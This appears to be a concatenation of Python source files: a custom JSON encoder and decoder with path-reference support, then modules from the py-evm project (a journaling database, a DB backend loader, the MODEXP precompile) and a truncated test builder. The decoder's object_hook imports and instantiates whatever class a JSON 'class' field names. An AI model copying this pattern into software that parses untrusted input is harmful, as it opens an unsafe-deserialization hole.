from json.encoder import py_encode_basestring_ascii, ESCAPE, ESCAPE_ASCII, HAS_UTF8, ESCAPE_DCT, INFINITY, FLOAT_REPR, encode_basestring, encode_basestring_ascii
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
NUMBER_RE = re.compile(r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?', FLAGS)
REF_RE = re.compile(
r'<([A-Z0-9_]+(?:\[[0-9]+(?:,[0-9]+)*\])?(?:\.[A-Z0-9_]+(?:\[[0-9]+(?:,[0-9]+)*\])?)*)>', flags=FLAGS | re.I)
PATH_RE = re.compile(
r'([A-Z0-9_]+)(?:\[([0-9]+(?:,[0-9]+)*)\])?', flags=FLAGS | re.I)
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
match_number = NUMBER_RE.match
match_reference = REF_RE.match
datetime_regex = re.compile(
'\"dt\((\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})Z\)\"')
timedelta_regex = re.compile('\"td\((\d+)\)\"')
#parse_object = context.parse_object
#parse_array = context.parse_array
#parse_string = context.parse_string
#match_number = NUMBER_RE.match
#match_reference = REF_RE.match
#encoding = context.encoding
#strict = context.strict
#parse_float = context.parse_float
#parse_int = context.parse_int
#parse_constant = context.parse_constant
#object_hook = context.object_hook
#object_pairs_hook = context.object_pairs_hook
class ModJSONDecoder(json.JSONDecoder):
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True,
object_pairs_hook=None):
"""``encoding`` determines the encoding used to interpret any ``str``
objects decoded by this instance (utf-8 by default). It has no
effect when decoding ``unicode`` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as ``unicode``.
``object_hook``, if specified, will be called with the result
of every JSON object decoded and its return value will be used in
place of the given ``dict``. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
``object_pairs_hook``, if specified will be called with the result of
every JSON object decoded with an ordered list of pairs. The return
value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes
priority.
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN.
This can be used to raise an exception if invalid JSON numbers
are encountered.
If ``strict`` is false (true is the default), then control
characters will be allowed inside strings. Control characters in
this context are those with character codes in the 0-31 range,
including ``'\\t'`` (tab), ``'\\n'``, ``'\\r'`` and ``'\\0'``.
"""
self.encoding = encoding
self.object_pairs_hook = object_pairs_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or json.decoder._CONSTANTS.__getitem__
self.strict = strict
self.parse_string = json.decoder.scanstring
self.object_dict_hook = None
def object_hook(self, d):
if 'class' in d:
class_path = d.pop('class')
modname, clsname = class_path.rsplit(".", 1)
#module_name = d.pop('__module__')
module = __import__(modname)
class_ = getattr(module, clsname)
args = dict((key.encode('ascii'), value)
for key, value in d.items())
inst = class_(**args)
else:
inst = d
return inst
def parse_object(self, s_and_end, root, working, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
pairs = []
pairs_append = pairs.append
# Use a slice to prevent IndexError from being raised, the following
# check will raise a more specific ValueError if the string is empty
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
if self.object_dict_hook is not None:
result = self.object_dict_hook(working)
return result, end + 1
if self.object_hook is not None:
working = self.object_hook(working)
return working, end + 1
elif nextchar != '"':
raise ValueError(errmsg(
"Expecting property name enclosed in double quotes", s, end))
end += 1
while True:
key, end = self.parse_string(s, end)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise ValueError(errmsg("Expecting ':' delimiter", s, end))
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
nextchar = s[end]
except IndexError:
raise ValueError(errmsg("Expecting object", s, end))
if nextchar == '{':
nextitem = {}
elif nextchar == '[':
nextitem = []
else:
nextitem = None
working[key] = nextitem
try:
value, end = self.scan_once(s, end, root, nextitem)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
# pairs_append((key, value))
working[key] = value
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting ',' delimiter", s, end - 1))
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise ValueError(errmsg(
"Expecting property name enclosed in double quotes", s, end - 1))
if self.object_pairs_hook is not None:
result = self.object_dict_hook(dict)
return result, end
if self.object_hook is not None:
working = self.object_hook(working)
return working, end
def parse_array(self, s_and_end, root, working, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return working, end + 1
_append = working.append
while True:
try:
nextchar = s[end]
except IndexError:
raise ValueError(errmsg("Expecting object", s, end))
if nextchar == '{':
nextitem = {}
elif nextchar == '[':
nextitem = []
else:
nextitem = None
_append(nextitem)
try:
value, end = self.scan_once(s, end, root, nextitem)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
if value is not nextitem:
del working[-1]
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting ',' delimiter", s, end))
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return working, end
def scan_once(self, string, idx, root, working):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return self.parse_string(string, idx + 1)
elif nextchar == '{':
return self.parse_object((string, idx + 1), root, working)
elif nextchar == '[':
return self.parse_array((string, idx + 1), root, working)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = self.parse_float(integer + (frac or '') + (exp or ''))
else:
res = self.parse_int(integer)
return res, m.end()
r = match_reference(string, idx)
if r is not None:
refname = r.groups()
obj = root
for name in refname[0].split("."):
name, indices = PATH_RE.match(name).groups()
if name:
if type(obj) == dict:
obj = obj[name]
elif type(obj) == list:
obj = obj[int(name)]
else:
obj = getattr(obj, name)
if indices:
for index in indices.split("."):
obj = obj[int(index)]
return obj, r.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return self.parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return self.parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return self.parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise ValueError(errmsg("Extra data", s, end, len(s)))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode``
beginning with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
nextchar = s[idx]
except IndexError:
raise ValueError(errmsg("Expecting object", s, idx))
if nextchar == '{':
root = {}
elif nextchar == '[':
root = []
else:
root = None
try:
obj, end = self.scan_once(s, idx, root, root)
except StopIteration:
raise ValueError("No JSON object could be decoded")
return obj, end
class ModJSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8', default=None):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If *ensure_ascii* is true (the default), all non-ASCII
characters in the output are escaped with \uXXXX sequences,
and the results are str instances consisting of ASCII
characters only. If ensure_ascii is False, a result may be a
unicode instance. This usually happens if the input contains
unicode strings or the *encoding* parameter is used.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation. Since the default
item separator is ', ', the output might include trailing
whitespace when indent is specified. You can use
separators=(',', ': ') to avoid this.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
if default is not None:
self.default = default
self.encoding = encoding
if self.ensure_ascii:
self._encoder = encode_basestring_ascii
else:
self._encoder = encode_basestring
if self.encoding != 'utf-8':
def _encoder(o, _orig_encoder=self._encoder, _encoding=self.encoding):
if isinstance(o, str):
o = o.decode(_encoding)
return _orig_encoder(o)
self._encoder = _encoder
def default(self, o, refs, path):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
if "json" in dir(o) and callable(o.json):
conf = o.json()
else:
conf = collections.OrderedDict()
conf["class"] = "{o.__class__.__module__}.{o.__class__.__name__}".format(
**vars())
if "__init__" in dir(o) and type(o.__init__) == new.instancemethod:
try:
arginspect = inspect.getargspec(o.__init__)
except:
raise TypeError(repr(o) + " is not JSON serializable")
if arginspect.defaults:
requiredargs = arginspect.args[
1:len(arginspect.args) - len(arginspect.defaults)]
argswithdefaults = arginspect.args[
len(arginspect.args) - len(arginspect.defaults):]
defaultvalues = arginspect.defaults
else:
requiredargs = arginspect.args[1:]
argswithdefaults = []
defaultvalues = []
for key in requiredargs:
try:
conf[key] = getattr(o, key)
except AttributeError:
print key
print refs.keys()
raise TypeError(
repr(o) + " is not JSON serializable (Cannot recover required argument '%s')" % key)
for key, default in zip(argswithdefaults, defaultvalues):
try:
value = getattr(o, key)
if value != default:
conf[key] = getattr(o, key)
except AttributeError:
pass
if path and not isinstance(conf, (int, long, bool, basestring)) and conf is not None:
pathstr = str(path[0])
numindices = []
for index in path[1:]:
if type(index) == int:
numindices.append(str(index))
else:
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
pathstr += ".%s" % index
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
if pathstr not in refs.keys():
refs[pathstr] = o
return conf
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8')):
o = o.decode(_encoding)
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, {}, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return ''.join(chunks)
def iterencode(self, o, refs, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
# if (_one_shot and c_make_encoder is not None
# and self.indent is None and not self.sort_keys):
#_iterencode = c_make_encoder(
#markers, self.default, _encoder, self.indent,
#self.key_separator, self.item_separator, self.sort_keys,
# self.skipkeys, self.allow_nan)
# else:
#_iterencode = _make_iterencode(
#markers, self.default, _encoder, self.indent, floatstr,
#self.key_separator, self.item_separator, self.sort_keys,
# self.skipkeys, _one_shot)
return self._iterencode(o, 0, markers, refs, ())
def _iterencode(self, o, _current_indent_level, markers, refs, path):
if isinstance(o, basestring):
yield self._encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
else:
ref = self._iterencode_ref(
o, _current_indent_level, markers, refs, path)
if ref:
yield ref
elif isinstance(o, (list, tuple)) and "json" not in dir(o):
for chunk in self._iterencode_list(o, _current_indent_level, markers, refs, path):
yield chunk
elif isinstance(o, dict) and "json" not in dir(o):
for chunk in self._iterencode_dict(o, _current_indent_level, markers, refs, path):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = self.default(o, refs, path)
for chunk in self._iterencode(o, _current_indent_level, markers, refs, path):
yield chunk
if markers is not None:
del markers[markerid]
def _iterencode_ref(self, o, _current_indent_level, markers, refs, path):
for key, value in refs.items():
if value is o:
return "<%s>" % key
def _iterencode_list(self, lst, _current_indent_level, markers, refs, path):
if path:
pathstr = str(path[0])
numindices = []
for index in path[1:]:
if type(index) == int:
numindices.append(str(index))
else:
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
pathstr += ".%s" % index
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
if pathstr not in refs.keys():
refs[pathstr] = lst
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if self.indent is not None:
_current_indent_level += 1
newline_indent = '\n' + \
(' ' * (self.indent * _current_indent_level))
separator = self.item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = self.item_separator
first = True
for (k, value) in enumerate(lst):
if first:
first = False
else:
buf = separator
if isinstance(value, basestring):
yield buf + self._encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, (int, long)):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
else:
ref = self._iterencode_ref(
value, _current_indent_level, markers, refs, path)
if ref and False:
yield buf + ref
else:
yield buf
if isinstance(value, (list, tuple)) and "json" not in dir(value):
chunks = self._iterencode_list(
value, _current_indent_level, markers, refs, path + (k,))
elif isinstance(value, dict) and "json" not in dir(value):
chunks = self._iterencode_dict(
value, _current_indent_level, markers, refs, path + (k,))
else:
chunks = self._iterencode(
value, _current_indent_level, markers, refs, path + (k,))
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (self.indent * _current_indent_level))
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(self, dct, _current_indent_level, markers, refs, path):
if path:
pathstr = str(path[0])
numindices = []
for index in path[1:]:
if type(index) == int:
numindices.append(str(index))
else:
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
pathstr += ".%s" % index
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
if pathstr not in refs.keys():
refs[pathstr] = dct
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if self.indent is not None:
_current_indent_level += 1
newline_indent = '\n' + \
(' ' * (self.indent * _current_indent_level))
item_separator = self.item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = self.item_separator
first = True
if self.sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.iteritems()
for key, value in items:
if isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, (int, long)):
key = str(key)
elif self.skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield self._encoder(key)
yield self.key_separator
if isinstance(value, basestring):
yield self._encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, (int, long)):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
else:
ref = self._iterencode_ref(
value, _current_indent_level, markers, refs, path)
if ref:
yield ref
else:
if isinstance(value, (list, tuple)) and "json" not in dir(value):
chunks = self._iterencode_list(
value, _current_indent_level, markers, refs, path + (key,))
elif isinstance(value, dict) and "json" not in dir(value):
chunks = self._iterencode_dict(
value, _current_indent_level, markers, refs, path + (key,))
else:
chunks = self._iterencode(
value, _current_indent_level, markers, refs, path + (key,))
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (self.indent * _current_indent_level))
yield '}'
if markers is not None:
del markers[markerid]
```
|
{
"source": "jestersimpps/py-evm",
"score": 2
}
|
#### File: evm/db/__init__.py
```python
import os
from evm.utils.module_loading import (
import_string,
)
DEFAULT_DB_BACKEND = 'evm.db.backends.memory.MemoryDB'
def get_db_backend_class(import_path=None):
if import_path is None:
import_path = os.environ.get(
'CHAIN_DB_BACKEND_CLASS',
DEFAULT_DB_BACKEND,
)
return import_string(import_path)
def get_db_backend(import_path=None, **init_kwargs):
backend_class = get_db_backend_class(import_path)
return backend_class(**init_kwargs)
```
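A short sketch of how the backend factory might be used; it relies on the default `MemoryDB` path declared above (assuming that backend can be constructed without arguments), and the environment-variable override is only illustrative.
```python
import os
from evm.db import get_db_backend, get_db_backend_class
# Default: resolves DEFAULT_DB_BACKEND and instantiates it.
db = get_db_backend()
# The class can also be selected via the CHAIN_DB_BACKEND_CLASS environment
# variable checked above (or passed explicitly as import_path).
os.environ["CHAIN_DB_BACKEND_CLASS"] = "evm.db.backends.memory.MemoryDB"
assert isinstance(db, get_db_backend_class())
```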
#### File: evm/db/journal.py
```python
import uuid
from cytoolz import (
merge,
)
from evm.db.backends.base import BaseDB
from evm.exceptions import ValidationError
class Journal(object):
"""
A Journal is an ordered list of checkpoints. A checkpoint is a dictionary
of database keys and values. The values are the "original" value of that
key at the time the checkpoint was created.
Checkpoints are referenced by a random uuid4.
"""
checkpoints = None
def __init__(self):
# contains an array of `uuid4` instances
self.checkpoints = []
# contains a mapping from all of the `uuid4` in the `checkpoints` array
        # to a dictionary of key:value pairs where the `value` is the original
# value for the given key at the moment this checkpoint was created.
self.journal_data = {}
@property
def latest_id(self):
"""
Returns the checkpoint_id of the latest checkpoint
"""
return self.checkpoints[-1]
@property
def latest(self):
"""
Returns the dictionary of db keys and values for the latest checkpoint.
"""
return self.journal_data[self.latest_id]
@latest.setter
def latest(self, value):
"""
Setter for updating the *latest* checkpoint.
"""
self.journal_data[self.latest_id] = value
def add(self, key, value):
"""
Adds the given key and value to the latest checkpoint.
"""
if not self.checkpoints:
# If no checkpoints exist we don't need to track history.
return
elif key in self.latest:
# If the key is already in the latest checkpoint we should not
# overwrite it.
return
self.latest[key] = value
def create_checkpoint(self):
"""
Creates a new checkpoint. Checkpoints are referenced by a random uuid4
to prevent collisions between multiple checkpoints.
"""
checkpoint_id = uuid.uuid4()
self.checkpoints.append(checkpoint_id)
self.journal_data[checkpoint_id] = {}
return checkpoint_id
def pop_checkpoint(self, checkpoint_id):
"""
Returns all changes from the given checkpoint. This includes all of
        the changes from any subsequent checkpoints, giving precedence to
earlier checkpoints.
"""
idx = self.checkpoints.index(checkpoint_id)
# update the checkpoint list
checkpoint_ids = self.checkpoints[idx:]
self.checkpoints = self.checkpoints[:idx]
# we pull all of the checkpoints *after* the checkpoint we are
# reverting to and collapse them to a single set of keys that need to
        # be reverted (giving precedence to earlier checkpoints).
revert_data = merge(*(
self.journal_data.pop(c_id)
for c_id
in reversed(checkpoint_ids)
))
return dict(revert_data.items())
def commit_checkpoint(self, checkpoint_id):
"""
        Collapses all changes for the given checkpoint into the previous
checkpoint if it exists.
"""
changes_to_merge = self.pop_checkpoint(checkpoint_id)
if self.checkpoints:
# we only have to merge the changes into the latest checkpoint if
# there is one.
self.latest = merge(
changes_to_merge,
self.latest,
)
def __contains__(self, value):
return value in self.journal_data
class JournalDB(BaseDB):
"""
A wrapper around the basic DB objects that keeps a journal of all changes.
Each time a snapshot is taken, the underlying journal creates a new
checkpoint. The journal then keeps track of the original value for any
keys changed. Reverting to a checkpoint involves merging the original key
data from any subsequent checkpoints into the given checkpoint giving
precidence earlier checkpoints. Then the keys from this merged data set
are reset to their original values.
The added memory footprint for a JournalDB is one key/value stored per
database key which is changed. Subsequent changes to the same key within
the same checkpoint will not increase the journal size since we only need
to track the original value for any given key within any given checkpoint.
"""
wrapped_db = None
journal = None
def __init__(self, wrapped_db):
self.wrapped_db = wrapped_db
self.journal = Journal()
def get(self, key):
return self.wrapped_db.get(key)
def set(self, key, value):
"""
- replacing an existing value
- setting a value that does not exist
"""
try:
current_value = self.wrapped_db.get(key)
except KeyError:
current_value = None
if current_value != value:
# only journal `set` operations that change the value.
self.journal.add(key, current_value)
return self.wrapped_db.set(key, value)
def exists(self, key):
return self.wrapped_db.exists(key)
def delete(self, key):
try:
current_value = self.wrapped_db.get(key)
except KeyError:
# no state change so skip journaling
pass
else:
self.journal.add(key, current_value)
return self.wrapped_db.delete(key)
#
# Snapshot API
#
def _validate_checkpoint(self, checkpoint):
"""
Checks to be sure the checkpoint is known by the journal
"""
if checkpoint not in self.journal:
raise ValidationError("Checkpoint not found in journal: {0}".format(
str(checkpoint)
))
def snapshot(self):
"""
Takes a snapshot of the database by creating a checkpoint.
"""
return self.journal.create_checkpoint()
def revert(self, checkpoint):
"""
Reverts the database back to the checkpoint.
"""
self._validate_checkpoint(checkpoint)
for key, value in self.journal.pop_checkpoint(checkpoint).items():
if value is None:
self.wrapped_db.delete(key)
else:
self.wrapped_db.set(key, value)
def commit(self, checkpoint):
"""
Commits a given checkpoint.
"""
self._validate_checkpoint(checkpoint)
self.journal.commit_checkpoint(checkpoint)
def clear(self):
"""
        Clear the entire journal.
"""
self.journal = Journal()
#
# Dictionary API
#
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
return self.set(key, value)
def __delitem__(self, key):
return self.delete(key)
def __contains__(self, key):
return self.exists(key)
```
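A minimal sketch of the snapshot/revert flow, assuming the in-memory backend named in the package defaults (`evm.db.backends.memory.MemoryDB`) can be constructed without arguments and exposes the plain get/set interface that `JournalDB` wraps.
```python
from evm.db.backends.memory import MemoryDB
from evm.db.journal import JournalDB
db = JournalDB(MemoryDB())
db[b'answer'] = b'42'
checkpoint = db.snapshot()
db[b'answer'] = b'43'  # journals the original value b'42'
db[b'other'] = b'x'    # journals None, i.e. "no previous value"
db.revert(checkpoint)  # restores b'42' and deletes b'other'
assert db[b'answer'] == b'42'
assert b'other' not in db
```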
#### File: evm/precompiles/modexp.py
```python
from evm import constants
from evm.utils.numeric import (
big_endian_to_int,
get_highest_bit_index,
int_to_big_endian,
)
from evm.utils.padding import (
pad32r,
zpad_right,
zpad_left,
)
def _compute_adjusted_exponent_length(exponent_length, first_32_exponent_bytes):
exponent = big_endian_to_int(first_32_exponent_bytes)
if exponent_length <= 32 and exponent == 0:
return 0
elif exponent_length <= 32:
return get_highest_bit_index(exponent)
else:
first_32_bytes_as_int = big_endian_to_int(first_32_exponent_bytes)
return (
8 * (exponent_length - 32) +
get_highest_bit_index(first_32_bytes_as_int)
)
def _compute_complexity(length):
if length <= 64:
return length ** 2
elif length <= 1024:
return (
length ** 2 // 4 + 96 * length - 3072
)
else:
        return length ** 2 // 16 + 480 * length - 199680
def _extract_lengths(data):
# extract argument lengths
base_length_bytes = pad32r(data[:32])
base_length = big_endian_to_int(base_length_bytes)
exponent_length_bytes = pad32r(data[32:64])
exponent_length = big_endian_to_int(exponent_length_bytes)
modulus_length_bytes = pad32r(data[64:96])
modulus_length = big_endian_to_int(modulus_length_bytes)
return base_length, exponent_length, modulus_length
def _compute_modexp_gas_fee(data):
base_length, exponent_length, modulus_length = _extract_lengths(data)
first_32_exponent_bytes = zpad_right(
data[96 + base_length:96 + base_length + exponent_length],
to_size=min(exponent_length, 32),
)[:32]
adjusted_exponent_length = _compute_adjusted_exponent_length(
exponent_length,
first_32_exponent_bytes,
)
complexity = _compute_complexity(max(modulus_length, base_length))
gas_fee = (
complexity *
max(adjusted_exponent_length, 1) //
constants.GAS_MOD_EXP_QUADRATIC_DENOMINATOR
)
return gas_fee
def _modexp(data):
base_length, exponent_length, modulus_length = _extract_lengths(data)
if base_length == 0:
return 0
elif modulus_length == 0:
return 0
# compute start:end indexes
base_end_idx = 96 + base_length
exponent_end_idx = base_end_idx + exponent_length
modulus_end_dx = exponent_end_idx + modulus_length
# extract arguments
modulus_bytes = zpad_right(
data[exponent_end_idx:modulus_end_dx],
to_size=modulus_length,
)
modulus = big_endian_to_int(modulus_bytes)
if modulus == 0:
return 0
base_bytes = zpad_right(data[96:base_end_idx], to_size=base_length)
base = big_endian_to_int(base_bytes)
exponent_bytes = zpad_right(
data[base_end_idx:exponent_end_idx],
to_size=exponent_length,
)
exponent = big_endian_to_int(exponent_bytes)
print('base', base, 'exponent', exponent, 'modulus', modulus)
result = pow(base, exponent, modulus)
return result
def modexp(computation):
"""
https://github.com/ethereum/EIPs/pull/198
"""
gas_fee = _compute_modexp_gas_fee(computation.msg.data)
computation.gas_meter.consume_gas(gas_fee, reason='MODEXP Precompile')
result = _modexp(computation.msg.data)
_, _, modulus_length = _extract_lengths(computation.msg.data)
result_bytes = zpad_left(int_to_big_endian(result), to_size=modulus_length)
computation.output = result_bytes
return computation
```
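To make the calldata layout concrete, this standalone sketch builds an EIP-198 style payload (three 32-byte big-endian length words followed by the base, exponent, and modulus bytes) and checks the expected result against Python's built-in `pow`; the helper is hypothetical and nothing is imported from the package.
```python
def encode_modexp_input(base, exponent, modulus):
    # Pack each operand big-endian, preceded by three 32-byte length words.
    def to_bytes(n):
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), 'big')
    base_b, exp_b, mod_b = to_bytes(base), to_bytes(exponent), to_bytes(modulus)
    header = (
        len(base_b).to_bytes(32, 'big')
        + len(exp_b).to_bytes(32, 'big')
        + len(mod_b).to_bytes(32, 'big')
    )
    return header + base_b + exp_b + mod_b
data = encode_modexp_input(3, 7, 11)
assert pow(3, 7, 11) == 9  # the value _modexp(data) is expected to return
```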
#### File: tools/test_builder/test_builder.py
```python
from collections import (
defaultdict,
namedtuple,
)
from functools import (
partial,
)
from evm.db.state import (
MainAccountStateDB,
ShardingAccountStateDB,
)
from evm.tools.fixture_tests import (
hash_log_entries,
)
from cytoolz import (
assoc,
assoc_in,
curry,
merge,
)
from eth_utils import (
apply_formatters_to_dict,
decode_hex,
encode_hex,
to_canonical_address,
)
from .normalization import (
normalize_bytes,
normalize_call_creates,
normalize_environment,
normalize_execution,
normalize_int,
normalize_logs,
normalize_state,
normalize_transaction,
normalize_transaction_group,
normalize_networks,
)
from .builder_utils import (
